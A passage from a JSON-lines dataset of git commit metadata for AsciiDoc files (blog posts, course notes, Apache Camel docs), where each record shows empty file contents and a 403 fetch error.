Giveaway!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-07-22-HUGE-100000-Subscriber-Giveaway.adoc","new_file":"_posts\/2012-07-22-HUGE-100000-Subscriber-Giveaway.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"443fb54c37d162f834c3f2c30f4738d19e937d0a","subject":"y2b create post This Gadget is ALWAYS Listening...","message":"y2b create post This Gadget is ALWAYS Listening...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-28-This-Gadget-is-ALWAYS-Listening.adoc","new_file":"_posts\/2016-07-28-This-Gadget-is-ALWAYS-Listening.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33ceadc7e434107248762b1195e25548471a5252","subject":"Update 2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","message":"Update 2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","new_file":"_posts\/2016-11-03-Creating-a-nice-Puppet-Workflow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e96158f9cba030195919debb8e97f6271a0964d","subject":"fix(Reference): fix typo","message":"fix(Reference): fix typo\n","repos":"lidasong2014\/promises-book,oToUC\/promises-book,liyunsheng\/promises-book,azu\/promises-book,xifeiwu\/promises-book,azu\/promises-book,sunfurong\/promise,wangwei1237\/promises-book,cqricky\/promises-book,wenber\/promises-book,purepennons\/promises-book,azu\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,oToUC\/promises-book,oToUC\/promises-book,mzbac\/promises-book,sunfurong\/promise,genie88\/promises-book,liubin\/promises-book,dieface\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,charlenopires\/promises-book,wenber\/promises-book,dieface\/promises-book,azu\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,wangwei1237\/promises-book,liyunsheng\/promises-book,liubin\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,tangjinzhou\/promises-book,genie88\/promises-book,charlenopires\/promises-book,purepennons\/promises-book,cqricky\/promises-book,liubin\/promises-book,dieface\/promises-book,mzbac\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,mzbac\/promises-book,sunfurong\/promise","old_file":"Appendix-Reference\/readme.adoc","new_file":"Appendix-Reference\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11cf75107400108c80cfd55efefe031374920845","subject":"Non 
callable","message":"Non callable\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d6e4f7555ca43fff411efa54cfb929d5c452ec3","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd842587d05fb315deef060cf7b560abaa57a797","subject":"Update 2016-04-12-Hive-Tracks-and-Ethics.adoc","message":"Update 2016-04-12-Hive-Tracks-and-Ethics.adoc","repos":"wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io,wattsap\/wattsap.github.io","old_file":"_posts\/2016-04-12-Hive-Tracks-and-Ethics.adoc","new_file":"_posts\/2016-04-12-Hive-Tracks-and-Ethics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wattsap\/wattsap.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0476fb65983f2b72dd9ca292b63788a76350f218","subject":"Deleted _posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","message":"Deleted _posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_file":"_posts\/2016-11-06-The-place-that-is-changing-my-perspectives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a953386565e4d001225ef93c67587e1e112235ad","subject":"Update 2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","message":"Update 2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","repos":"carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io,carlomorelli\/carlomorelli.github.io","old_file":"_posts\/2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","new_file":"_posts\/2017-04-23-Easily-designing-the-DB-connection-from-Java.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/carlomorelli\/carlomorelli.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c2cb9a166752ee19cf0df9543b5a97ed5f2c8642","subject":"y2b create post This Is Probably The Ultimate Battery...","message":"y2b create post This Is Probably The Ultimate 
Battery...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-25-This-Is-Probably-The-Ultimate-Battery.adoc","new_file":"_posts\/2017-03-25-This-Is-Probably-The-Ultimate-Battery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecfa4dbfcd1149c389870b00d07d40eb47af0c54","subject":"y2b create post CES 2015 - THE FINALE","message":"y2b create post CES 2015 - THE FINALE","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-01-12-CES-2015--THE-FINALE.adoc","new_file":"_posts\/2015-01-12-CES-2015--THE-FINALE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f84151dc657c780ce602f79473fb93bcdf61045f","subject":"Update 2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","message":"Update 2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","repos":"jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog,jabbytechnologies\/blog","old_file":"_posts\/2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","new_file":"_posts\/2016-12-20-Utiliser-lAPI-Google-Sheets-via-un-proxy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabbytechnologies\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba66a60ab6871091094ef634fc29318a3b87146a","subject":"Deleted 2016-5-13-Engineer-Career-Path.adoc","message":"Deleted 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21ebbff067d094b645402195af6f914cd42e4f14","subject":"add spec guide","message":"add spec guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/spec.adoc","new_file":"content\/guides\/spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f47967aed2b2870fb6196f7493cb677f4b05f2b3","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8239241a65827a95c79399378fa5e3979932e888","subject":"Update 2015-10-12-My-Blog.adoc","message":"Update 
2015-10-12-My-Blog.adoc","repos":"mazongo\/mazongo.github.io,mazongo\/mazongo.github.io,mazongo\/mazongo.github.io","old_file":"_posts\/2015-10-12-My-Blog.adoc","new_file":"_posts\/2015-10-12-My-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mazongo\/mazongo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6a772c950dcd3367e1829323bfc75e31ebdd5671","subject":"y2b create post Nyko Raven Controller Unboxing \\u0026 Overview","message":"y2b create post Nyko Raven Controller Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-16-Nyko-Raven-Controller-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-16-Nyko-Raven-Controller-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e5fdeb71bcc4632091be207572119a5e93f41fb9","subject":"Checkstyle","message":"Checkstyle\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"799792c1182dcc5e43d43dba788750aa7c67d968","subject":"doc for zabbix 30 deploy","message":"doc for zabbix 30 
deploy\n","repos":"jupierce\/openshift-tools,andrewklau\/openshift-tools,drewandersonnz\/openshift-tools,openshift\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,blrm\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,twiest\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,joelsmith\/openshift-tools,themurph\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,joelsmith\/openshift-tools,tiwillia\/openshift-tools,jupierce\/openshift-tools,ivanhorvath\/openshift-tools,joelddiaz\/openshift-tools,themurph\/openshift-tools,tiwillia\/openshift-tools,themurph\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,joelddiaz\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,tiwillia\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,twiest\/openshift-tools,openshift\/openshift-tools,blrm\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,ivanhorvath\/openshift-tools,openshift\/openshift-tools,ivanhorvath\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,drewandersonnz\/openshift-tools,joelsmith\/openshift-tools,jupierce\/openshift-tools,andrewklau\/openshift-tools,andrewklau\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,twiest\/openshift-tools,ivanhorvath\/openshift-tools,andrewklau\/openshift-tools,rhdedgar\/openshift-tools,themurph\/openshift-tools,drewandersonnz\/openshift-tools,drewandersonnz\/openshift-tools","old_file":"docs\/zabbix_3.0.asciidoc","new_file":"docs\/zabbix_3.0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"06261398f6dea2a33ffbf83afa9f74fcaa76c9eb","subject":"Update 2016-12-09-Azure-Machine-Learning.adoc","message":"Update 2016-12-09-Azure-Machine-Learning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_file":"_posts\/2016-12-09-Azure-Machine-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2a1091416a2974794b48fbf88a8edb34a1a9bde","subject":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","message":"create post 3 Unique Gadgets You Wouldn't Expect To Exist","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_file":"_posts\/2018-02-26-3-Unique-Gadgets-You-Wouldnt-Expect-To-Exist.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"467e6094d4aa5fda92917b797bb10702c535f352","subject":"Update 
2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef18313d4f4e900ea3c83630320f80e2615a6fa9","subject":"Update 2016-04-01-Ill-find-you.adoc","message":"Update 2016-04-01-Ill-find-you.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_file":"_posts\/2016-04-01-Ill-find-you.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95323bc4ae96a8846efc9f929ac26e8a3cb830c4","subject":"Renamed '_posts\/2019-01-31-Blog-Servers.adoc' to '_posts\/2018-01-09-Blog-Servers.adoc'","message":"Renamed '_posts\/2019-01-31-Blog-Servers.adoc' to '_posts\/2018-01-09-Blog-Servers.adoc'","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2018-01-09-Blog-Servers.adoc","new_file":"_posts\/2018-01-09-Blog-Servers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a459a25c0d05416a91b4b7605215d350017d1929","subject":"Create ScalaTopTips.adoc","message":"Create ScalaTopTips.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"ScalaTopTips.adoc","new_file":"ScalaTopTips.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"3829cc601b21fae74078871ece2b1725fbe09a8f","subject":"Update 2017-08-10-AICSS.adoc","message":"Update 2017-08-10-AICSS.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-08-10-AICSS.adoc","new_file":"_posts\/2017-08-10-AICSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"67fad92bd8e2fd436bfc1e26a98576f500638745","subject":"Update 2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","message":"Update 
2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","new_file":"_posts\/2016-08-17-Episode-68-Blab-is-Dead-Long-live-Blab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15d843da73ba148e43feeaf7b2ae4ec634e78ff2","subject":"Update 2016-06-05-T-E-S-T.adoc","message":"Update 2016-06-05-T-E-S-T.adoc","repos":"isaacriquelme\/endata.do,isaacriquelme\/endata.do,isaacriquelme\/endata.do,isaacriquelme\/endata.do","old_file":"_posts\/2016-06-05-T-E-S-T.adoc","new_file":"_posts\/2016-06-05-T-E-S-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/isaacriquelme\/endata.do.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9137da62aa0a12ed333233f92e1a3dc099bba863","subject":"2016-07-08-Badluck.adoc","message":"2016-07-08-Badluck.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-08-Badluck.adoc","new_file":"_posts\/2016-07-08-Badluck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a50abb8fedbee896aac41be21098e69681ec923b","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f196d24547c7429e4f13ccd6baf96582b318d2a2","subject":"Update 2018-01-16-Azure-9.adoc","message":"Update 2018-01-16-Azure-9.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-16-Azure-9.adoc","new_file":"_posts\/2018-01-16-Azure-9.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fafab65e19ef30637a49f6f43954ac4db8e600bc","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1a9b80554e662cd2a465a02847a2c298ef071b7c","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0aadbdc403317957e408b7e00d6efb6df79bf1e8","subject":"CAMEL-14555 - Create an AWS-S3 component based on SDK v2, regen docs","message":"CAMEL-14555 - Create an AWS-S3 component based on SDK v2, regen docs\n","repos":"nicolaferraro\/camel,cunningt\/camel,alvinkwekel\/camel,pax95\/camel,christophd\/camel,christophd\/camel,nicolaferraro\/camel,DariusX\/camel,adessaigne\/camel,alvinkwekel\/camel,apache\/camel,ullgren\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,christophd\/camel,ullgren\/camel,zregvart\/camel,nicolaferraro\/camel,tadayosi\/camel,tdiesler\/camel,mcollovati\/camel,zregvart\/camel,tadayosi\/camel,zregvart\/camel,pax95\/camel,nikhilvibhav\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,apache\/camel,nikhilvibhav\/camel,tadayosi\/camel,cunningt\/camel,mcollovati\/camel,pmoerenhout\/camel,ullgren\/camel,DariusX\/camel,apache\/camel,DariusX\/camel,tdiesler\/camel,apache\/camel,ullgren\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,nikhilvibhav\/camel,cunningt\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,alvinkwekel\/camel,gnodet\/camel,adessaigne\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,pmoerenhout\/camel,mcollovati\/camel,gnodet\/camel,apache\/camel,tadayosi\/camel,mcollovati\/camel,zregvart\/camel,nicolaferraro\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,alvinkwekel\/camel,gnodet\/camel","old_file":"components\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc","new_file":"components\/camel-aws2-s3\/src\/main\/docs\/aws2-s3-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"edbde181535582b606c377df2f72c1eec2c39388","subject":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","message":"Update 2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_file":"_posts\/2016-08-05-lets-log-aggrigation-using-Log-Zoom-and-Filebeat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7de751bf8cd520d07e153cc5811dffb4acdeeb16","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7ac3b0dfaf719ec75a4eb580b6daabf8f098e4","subject":"Update 2018-07-03-vr-lt.adoc","message":"Update 2018-07-03-vr-lt.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-03-vr-lt.adoc","new_file":"_posts\/2018-07-03-vr-lt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e69d041712b9e7b8473475d7362bc1dd0b22c93","subject":"Update 2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","message":"Update 2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","new_file":"_posts\/2018-06-14-Microsecond-latency-Microservice-Benchmarked.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3b7b260a84db0cd830df387895ebe4e8428b3b2e","subject":"Added references","message":"Added references\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7144cc2aec8bc81ad084c705dbe1dc3430577248","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/the_city.adoc","new_file":"content\/writings\/the_city.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"013b91ae1b2110568954b5397ed8305eac3a7321","subject":"Update 2015-03-23-Enhancing-HubPress-Documentation.adoc","message":"Update 
